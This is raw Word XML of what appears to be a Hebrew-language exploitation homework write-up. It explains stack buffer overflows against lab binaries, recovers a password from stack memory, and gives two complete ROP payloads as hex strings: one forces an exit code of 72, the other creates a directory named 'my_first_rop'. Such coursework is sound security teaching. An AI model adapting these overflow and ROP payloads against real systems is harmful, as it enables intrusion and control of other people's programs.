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proofErr w:type="spellStart"/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  <w:proofErr w:type="spellEnd"/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601B1E9E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לאחר הכנסת הסיסמה, 16 התווים </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00506840" w:rsidRPr="00506840">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>supercalifragili</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00506840" w:rsidRPr="00506840">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"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ייכנסו לתוך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. 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מעל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במחסנית יש את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rb</w:t>
      </w:r>
      <w:r w:rsidR="00D84602">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x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ולכן 8 הבתים הבאים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sticexpi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הערך שלו.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לבסוף 8 הבתים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alidocio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ערך החזרה ששמור במחסנית.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בזיכרון הם שמורים כך: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61 6c 69 64 6f 63 69 6f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, ולכן לאחר שנקרא ב-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little endian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נקבל את התשובה.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5147E18A" w14:textId="77777777" w:rsidR="00506840" w:rsidRDefault="00506840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8F0A7B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EF7B22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E70403F" w14:textId="635F6D79" w:rsidR="00813BB9" w:rsidRDefault="00813BB9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lastRenderedPageBreak/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EA5927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178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78C5167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241116B" w:rsidR="00654175" w:rsidRDefault="00907A31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907A31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x4008f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</w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2821" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="27F67AF4" w14:textId="00B109C9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4c 01 </w:t>
            </w:r>
            <w:r w:rsidR="00AA7899"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 c3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F335256" w:rsidR="00654175" w:rsidRDefault="006440E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x400e1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</w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2821" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0178EDBF" w14:textId="4498F594" w:rsidR="0023229B" w:rsidRDefault="00F86CA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55 48 89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  <w:r w:rsidR="000826D4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</w:t>
            </w:r>
            <w:r w:rsidR="006440ED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d0</w:t>
            </w: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7365CAB0" w:rsidR="008E4470" w:rsidRPr="00BA2C4D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1BCA2F99" w14:textId="1557B090" w:rsidR="00BA2C4D" w:rsidRPr="00E5781B" w:rsidRDefault="00BA2C4D" w:rsidP="00BA2C4D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:bidi/>
        <w:jc w:val="bot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>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0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הקלט שיגרום לתוכנית לצאת עם ערך היציאה הרצוי הוא:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="601D38E9" w14:textId="2F4BD597" w:rsidR="00BA2C4D" w:rsidRPr="00E5781B" w:rsidRDefault="00BA2C4D" w:rsidP="00BA2C4D">
      <w:pPr>
        <w:pStyle w:val="ListParagrap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="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:highlight w:val="yellow"/>
          <w:rtl/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>\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x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x6d\x1b\x40\x00\x00\x00\x00\x00\x48\x00\x00\x00\x00\x00\x00\x00\x71\x0e\x40\x00\x00\x00\x00\x00\x3c\x00\x00\x00\x00\x00\x00\x00\x78\x11\x40\x00\x00\x00\x00\x00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4DBF26" w14:textId="19436BE4" w:rsidR="00BA2C4D" w:rsidRPr="00E5781B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24 הבתים הראשונים (שערכם שרירותי ובחרנו שיהיו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0x61=’a’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) נועדו על מנת למלא את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password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ואת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rbx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במחסנית.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="411E84F1" w14:textId="507E666A" w:rsidR="00AA2BE3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(\x6d\x1b\x40\x00\x00\x00\x00\x00)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 שבעזרתה נעדכן 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שצפוי להכיל את ערך היציאה מהתוכנית לאחר שנבצע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עבור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=60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כלומר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(\x48\x00\x00\x00\x00\x00\x00\x00)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לאחר שעשינו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(\x71\x0e\x40\x00\x00\x00\x00\x00)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(\x3c\x00\x00\x00\x00\x00\x00\x00)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שהוא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60=0x3c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על מנת שכשנגיע ל-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נבצע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עם ערך היציאה שב-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האחרונים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(\x78\x11\x40\x00\x00\x00\x00\x00)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הם הכתובת של הפקודה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lastRenderedPageBreak/>
        <w:t>הקודם.</w:t>
      </w:r>
      <w:r w:rsidR="006D498C"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מפני שבעת ביצוע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60 והערך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אז נבצע יציאה מהתוכנית עם ערך היציאה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0x48=72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</w:p>
    <w:p w14:paraId="1C2BDC42" w14:textId="71BDFD9E" w:rsidR="006D498C" w:rsidRPr="00BA2C4D" w:rsidRDefault="006D498C" w:rsidP="006D498C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:bidi/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:rtl/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
          <w:noProof/>
          <w:rtl/>
          <w:lang w:val="he-IL"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="20B797CD" wp14:editId="6364E9BE">
            <wp:extent cx="573151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646" w14:textId="77777777" w:rsidR="00AA2BE3" w:rsidRDefault="00AA2BE3" w:rsidP="00BA2C4D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7DA9A6C0" w14:textId="47A437E0" w:rsidR="0043773A" w:rsidRPr="0043773A" w:rsidRDefault="008E4470" w:rsidP="0043773A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0200610C" w14:textId="0E2FC627" w:rsidR="0043773A" w:rsidRDefault="0043773A" w:rsidP="0043773A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</w:p>
    <w:p w14:paraId="004B56A3" w14:textId="30D0CDB6" w:rsidR="008C3F5F" w:rsidRDefault="008C3F5F" w:rsidP="008C3F5F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/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>הקלט שיגרום לתוכנית ליצור את התיקייה הוא:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55707E81" w14:textId="7D7139FE" w:rsidR="008C3F5F" w:rsidRPr="008C3F5F" w:rsidRDefault="008C3F5F" w:rsidP="008C3F5F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:hint="cs"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C3F5F">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>aaaaaaaaaaamy_first_rop\x00\x71\x0e\x40\x00\x00\x00\x00\x00\xa1\x1d\x40\x00\x00\x00\x00\x00\x1e\x0e\x40\x00\x00\x00\x00\x00\x71\x0e\x40\x00\x00\x00\x00\x00\xa1\x1d\x40\x00\x00\x00\x00\x00\x1e\x0e\x40\x00\x00\x00\x00\x00\x6d\x1b\x40\x00\x00\x00\x00\x00\xe3\xff\xff\xff\xff\xff\xff\xff\xf5\x08\x40\x00\x00\x00\x00\x00\xa1\x1d\x40\x00\x00\x00\x00\x00\xed\x01\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\x71\x0e\x40\x00\x00\x00\x00\x00\x53\x00\x00\x00\x00\x00\x00\x00\x78\x11\x40\x00\x00\x00\x00\x00</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="008C3F5F" w:rsidRPr="008C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826D4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3773A"/>
    <w:rsid w:val="004B393E"/>
    <w:rsid w:val="004C45B9"/>
    <w:rsid w:val="004C5A4F"/>
    <w:rsid w:val="004C7860"/>
    <w:rsid w:val="004D10DD"/>
    <w:rsid w:val="004E1B8F"/>
    <w:rsid w:val="004E7FE9"/>
    <w:rsid w:val="00506840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440ED"/>
    <w:rsid w:val="00654175"/>
    <w:rsid w:val="006A3EF9"/>
    <w:rsid w:val="006C7855"/>
    <w:rsid w:val="006D498C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3F5F"/>
    <w:rsid w:val="008C719F"/>
    <w:rsid w:val="008D6EE8"/>
    <w:rsid w:val="008E4470"/>
    <w:rsid w:val="00907A31"/>
    <w:rsid w:val="009863A6"/>
    <w:rsid w:val="00996F8C"/>
    <w:rsid w:val="009A1C97"/>
    <w:rsid w:val="009F424F"/>
    <w:rsid w:val="009F79A8"/>
    <w:rsid w:val="00A77810"/>
    <w:rsid w:val="00AA2BE3"/>
    <w:rsid w:val="00AA7899"/>
    <w:rsid w:val="00AD1CB6"/>
    <w:rsid w:val="00AF04D7"/>
    <w:rsid w:val="00B130CB"/>
    <w:rsid w:val="00B256A6"/>
    <w:rsid w:val="00B621A3"/>
    <w:rsid w:val="00B62566"/>
    <w:rsid w:val="00B7768B"/>
    <w:rsid w:val="00BA2C4D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84602"/>
    <w:rsid w:val="00D9596B"/>
    <w:rsid w:val="00DA46C7"/>
    <w:rsid w:val="00DB3FEE"/>
    <w:rsid w:val="00DC3F07"/>
    <w:rsid w:val="00DC42F9"/>
    <w:rsid w:val="00DD5165"/>
    <w:rsid w:val="00E1080A"/>
    <w:rsid w:val="00E3719B"/>
    <w:rsid w:val="00E5781B"/>
    <w:rsid w:val="00EA5ACB"/>
    <w:rsid w:val="00EE3903"/>
    <w:rsid w:val="00F07912"/>
    <w:rsid w:val="00F617F4"/>
    <w:rsid w:val="00F65E49"/>
    <w:rsid w:val="00F75706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11992</TotalTime>
  <Pages>8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52</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-10-09T09:35:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-12-27T20:33:00Z</dcterms:modified>
</cp:coreProperties>
</file>